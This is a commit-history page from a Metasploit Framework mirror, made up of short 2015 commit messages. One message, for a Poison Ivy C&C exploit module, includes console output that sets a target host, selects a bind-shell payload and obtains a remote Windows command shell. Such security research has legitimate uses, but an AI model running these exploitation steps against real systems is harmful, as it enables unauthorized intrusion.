infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
35,726 Commits
7 Branches
556 Tags
421 MiB
Commit Graph

35726 Commits (9e5f47e8dca5003d915bbf99cda3782e1b2606f9)

Author SHA1 Message Date
Fernando Arias 0bb03db786
Rework vuln lookup logic to account for vuln with no service (nexpose import vuln with -1 port) 
MSP-13234
 2015-09-09 13:21:05 -05:00
Fernando Arias e88a14aee6
Rework exception handler for exploit simple 
MSP-13233
 2015-09-09 11:51:18 -05:00
Roberto Soares d3aa61d6a0 Move bolt_file_upload.rb to exploits/multi/http 2015-09-09 13:41:44 -03:00
James Lee 439e65aab9
Clean up .mailmap 
Addresses without names cover all names for that address.
 2015-09-09 08:42:15 -05:00
Roberto Soares 2800ecae07 Fix alignment. 2015-09-09 01:21:08 -03:00
Roberto Soares 48bd2c72a0 Add fail_with method and other improvements 2015-09-09 01:11:35 -03:00
Roberto Soares f08cf97224 Check method implemented 2015-09-08 23:54:20 -03:00
Roberto Soares 6de0c9584d Fix some improvements 2015-09-08 23:15:42 -03:00
JT 31a8907385 Update simple_backdoors_exec.rb 2015-09-09 08:30:21 +08:00
jvazquez-r7 329e6f4633
Fix title 2015-09-08 15:31:14 -05:00
jvazquez-r7 30cb93b4df
Land #5940, @hmoore-r7's fixes for busybox post modules 2015-09-08 15:12:23 -05:00
Louis Sato 438ff9b667
MSP-13025 
Upgrading metasploit-credential version to 1.0.1
 2015-09-08 12:01:20 -05:00
wchen-r7 122d57fc20
Land #5945, Add auto-accept to osx/enum_keychain 2015-09-08 10:56:08 -05:00
wchen-r7 13afbc4eae Properly check root for remove_lock_root (android post module) 
This uses the Msf::Post::Android::Priv mixin.
 2015-09-08 10:40:08 -05:00
Brent Cook 4aae9b8272 support upgrading a powershell session to meterpreter 2015-09-08 15:37:42 +02:00
JT 4e23bba14c Update simple_backdoors_exec.rb 
removing the parenthesis for the if statements
 2015-09-08 15:47:38 +08:00
JT 002aada59d Update simple_backdoors_exec.rb 
changed shell to res
 2015-09-08 14:54:26 +08:00
JT 467f9a8353 Update simple_backdoors_exec.rb 2015-09-08 14:45:54 +08:00
JT 37c28ddefb Update simple_backdoors_exec.rb 
Updated the description
 2015-09-08 13:42:12 +08:00
JT b4ae8de0e8 Update simple_backdoors_exec.rb 2015-09-08 13:25:44 +08:00
JT 0f8123ee23 Simple Backdoor Shell Remote Code Execution 2015-09-08 13:08:47 +08:00
joev 1b320bae6a Add auto-accept to osx/enum_keychain. 2015-09-07 21:17:49 -05:00
Manuel Mancera e97056a367 When the port state is open|filtered should be unknown, no open 2015-09-07 22:52:03 +02:00
samvartaka 0a0e7ab4ba This is a modification to the original poisonivy_bof.rb exploit 
module removing the need for bruteforce in the case of an unknown
server password by (ab)using the challenge-response as an encryption
oracle, making it more reliable. The vulnerability has also been confirmed
in versions 2.2.0 up to 2.3.1 and additional targets for these versions
have been added as well.

See http://samvartaka.github.io/malware/2015/09/07/poison-ivy-reliable-exploitation/
for details.

## Console output

Below is an example of the new functionality (PIVY C2 server password is
set to 'prettysecure' and unknown to attacker). Exploitation of versions 2.3.0 and 2.3.1
is similar.

### Version 2.3.2 (unknown password)

```
msf > use windows/misc/poisonivy_bof
msf exploit(poisonivy_bof) > set RHOST 192.168.0.103
RHOST => 192.168.0.103
msf exploit(poisonivy_bof) > check

[*] Vulnerable Poison Ivy C&C version 2.3.1/2.3.2 detected.
[*] 192.168.0.103:3460 - The target appears to be vulnerable.
msf exploit(poisonivy_bof) > set PAYLOAD windows/shell_bind_tcp
PAYLOAD => windows/shell_bind_tcp
msf exploit(poisonivy_bof) > exploit

[*] Started bind handler
[*] Performing handshake...
[*] Sending exploit...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\winxp\Desktop\Poison Ivy\Poison Ivy 2.3.2>
```

### Version 2.2.0 (unknown password)

```
msf exploit(poisonivy_bof) > check

[*] Vulnerable Poison Ivy C&C version 2.2.0 detected.
[*] 192.168.0.103:3460 - The target appears to be vulnerable.

msf exploit(poisonivy_bof) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Poison Ivy 2.2.0 on Windows XP SP3 / Windows 7 SP1
   1   Poison Ivy 2.3.0 on Windows XP SP3 / Windows 7 SP1
   2   Poison Ivy 2.3.1, 2.3.2 on Windows XP SP3 / Windows 7 SP1

msf exploit(poisonivy_bof) > set TARGET 0
TARGET => 0

msf exploit(poisonivy_bof) > exploit

[*] Started bind handler
[*] Performing handshake...
[*] Sending exploit...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\winxp\Desktop\Poison Ivy\Poison Ivy 2.2.0>
```
 2015-09-07 17:48:28 +02:00
HD Moore ec5cbc842e Cosmetic cleanups 2015-09-05 22:56:11 -05:00
HD Moore 8c0b0ad377 Fix up jailbreak commands & regex for success detection 2015-09-05 22:54:07 -05:00
HD Moore 091c4d5214 Expand and reorder 2015-09-05 22:51:32 -05:00
HD Moore 76d74576db Remove FTP-only default credentials 2015-09-05 22:39:51 -05:00
HD Moore 21b69b9430 Remove HP MPE/iX password defaults 2015-09-05 22:38:30 -05:00
JT 2f8dc7fdab Update w3tw0rk_exec.rb 
changed response to res
 2015-09-05 14:21:07 +08:00
Brent Cook d7887b59aa
Land #5892, update pcaprub to the latest version 2015-09-04 17:26:29 -05:00
Brent Cook 408edda4de add libpcap-dev to our travis dependencies 2015-09-04 17:24:49 -05:00
Brent Cook a3d212c92b
Land #5933, ensure commands exit with consistent status from -h 2015-09-04 17:07:09 -05:00
jvazquez-r7 23ab702ec4
Land #5631, @blincoln682F048A's module for Endian Firewall Proxy 
* Exploit CVE-2015-5082
 2015-09-04 16:28:32 -05:00
jvazquez-r7 2abfcd00b1
Use snake_case 2015-09-04 16:27:09 -05:00
jvazquez-r7 15aa5de991
Use Rex::MIME::Message 2015-09-04 16:26:53 -05:00
jvazquez-r7 adcd3c1e29
Use static max length 2015-09-04 16:18:55 -05:00
jvazquez-r7 1ebc25092f
Delete some comments 2015-09-04 16:18:15 -05:00
Roberto Soares cc405957db Add some improvements 2015-09-04 16:02:30 -03:00
wchen-r7 5646f2e0c4 successful status should include last_attempted_at 2015-09-04 13:45:44 -05:00
wchen-r7 cf6d5fac2a Use the latest cred API, no more report_auth_info 2015-09-04 13:43:15 -05:00
Roberto Soares 4531d17cab Added the rest of the code 2015-09-04 15:37:42 -03:00
jvazquez-r7 eaf51a2113
Land #5722, @vallejocc's busybox work 2015-09-04 13:36:44 -05:00
jvazquez-r7 5dd0cee36a
Add comment 2015-09-04 13:30:00 -05:00
Roberto Soares b9ba12e42a Added get_token method. 2015-09-04 15:27:28 -03:00
jvicente 2b2dec3531 Fixed typo direcotry. 2015-09-04 18:52:55 +02:00
Vallejocc 4cdbabdde7 Merge pull request #1 from jvazquez-r7/review_5722 
Code review and cleanup for Busybox PR
 2015-09-04 18:45:53 +02:00
jvazquez-r7 319bc2d750
Use downcase 2015-09-04 11:18:09 -05:00
jvazquez-r7 05e1a69fe5
Add specs for prepend 2015-09-04 11:14:53 -05:00
jvazquez-r7 da221b82a8
Initialize dir 2015-09-04 11:07:49 -05:00